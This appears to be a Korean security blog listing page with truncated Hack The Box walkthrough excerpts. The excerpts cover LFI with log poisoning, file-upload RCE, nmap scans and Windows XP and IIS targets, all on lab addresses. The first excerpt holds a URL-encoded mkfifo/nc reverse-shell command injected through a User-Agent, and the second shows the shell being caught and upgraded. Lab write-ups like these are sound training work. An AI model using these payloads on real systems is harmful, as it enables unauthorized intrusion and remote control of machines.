정보보안

LFI가 가능하다.대놓고 phpinfo() 위치를 알려준다.allow_url_include가 Off라 RFI는 불가능하다.Log Poisoning을 위해 log파일 경로를 알아내야 한다./usr/local/etc/apache24/httpd.conf(경로 guessing)에서 log파일 경로를 알려준다./var/log/httpd-access.log를 찾았다. // 다만 firefox와 burp가 파일의 사이즈 때문에 자살한다.. User-Agent에 로그에 삽입되어 실행될 php 코드를 넣고 cmd 매개변수를 통해 nc를 실행한다.pipe shell: Pentest Monkey’s Cheatsheet cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%2..

RCE via Fileupload작은 사이즈( 사이트에 해당 파일을 업로드한다. 업로드된 파일의 URL에 접속한다. 리스닝 하던 포트로 쉘을 획득했다.$ nc -lvnp 4444>connect to [10.10.14.25] from (UNKNOWN) [10.129.67.226] 48594sh: no job control in this shellsh-4.2$ python -c 'import pty;pty.spawn("/bin/bash")'bash-4.2$ ^Z[1]+ Stopped nc -lvnp 4444┌──(jujjing㉿HARU0909)-[~/htb/networked/poc]└─$ stty raw -echo; fg>nc -lvnp 4444bash-4.2$ export T..

1. nmap$ nmap -T5 -p- -Pn -n --open --max-retries 2 10.129.67.137 -sV -sC -oA fullscanStarting Nmap 7.94 ( https://nmap.org ) at 2023-09-04 10:34 KSTNmap scan report for 10.129.67.137Host is up (0.097s latency).Not shown: 45970 filtered tcp ports (no-response), 19563 closed tcp ports (conn-refused)Some closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE VER..

1. nmap// 담엔 풀스캔 잘 안되면 이거 써보자.nmap -p- -T5 -oA nmapfull [Target IP]$ nmap -p- -Pn -n --open --max-retries 2 --min-rate 10000 10.129.67.50 -oA allportStarting Nmap 7.94 ( https://nmap.org ) at 2023-09-03 23:39 KSTNmap scan report for 10.129.67.50Host is up (0.11s latency).Not shown: 65305 filtered tcp ports (no-response), 226 closed tcp ports (conn-refused)Some closed ports may be reported as fil..

배운 것 :1. ssh에서 서버와 클라이언트 간에 상호 서명을 지원하는 알고리즘이 없을 때 발생하는 에러 해결법sign_and_send_pubkey: no mutual signature supported--> -o PubkeyAcceptedKeyTypes=+ssh-rsa를 ssh 명령어에 추가  1. nmap$ nmap -sV -sC 10.129.77.85 -Pn -n --max-retries 2 --min-rate 8000 --open --top-ports 2000 -oA svscStarting Nmap 7.94 ( https://nmap.org ) at 2023-09-03 13:45 KSTNmap scan report for 10.129.77.85Host is up (0.10s latency).Not..

OS : LINUX취약점 : pfsense 2.3.1배운 점 : gobuster를 빡세게 돌려야 함. 느낀 점 : credential만 찾으면 바로 root까지 딸 수 있는데 이걸 못 찾아서 몇 시간을 날림.-------------------------------------------------------------------------------------------------------------------------------nmap을 돌려봄.80, 443이 도출됨.lighttpd 1.4.35 버전을 사용하는 것만 나옴.해당 취약점에 대해 열심히 찾아보았으나 결론은 땡. 안 됨.  gobuster를 돌려봄.gobuster dir -u [ip] -w /usr/share/dirb/wordlists/co..

Target IP: 10.129.95.233Attacker IP: 10.10.14.111. 정보수집nmap결과 > 80번 포트만 오픈됨.$ nmap -sV -sC --open -Pn -n --max-retries 2 --min-rate 6000 10.129.95.233 -oA svsc>PORT STATE SERVICE VERSION80/tcp open http Microsoft IIS httpd 6.0| http-methods:|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH|_http-title: Under Construction| http-webdav-scan..

Target IP: 10.129.95.234Attacker IP: 10.10.14.311. 정보수집nmap결과 > 80번 포트만 도출됨$ nmap -sV -sC --open -Pn -n --max-retries 2 --min-rate 6000 -oA svsc 10.129.95.234 >Nmap scan report for 10.129.95.234 Host is up (0.12s latency). Not shown: 999 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE VERSION 80/tcp open htt..

Target IP: 10.129.131.119MY IP: 10.10.14.17$ nmap -sV -sC 10.129.193.207 --top-ports 2000 -max-retries 2 -Pn --open -n -oA legacyPORT STATE SERVICE VERSION135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open Windows XP microsoft-dsService Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microso..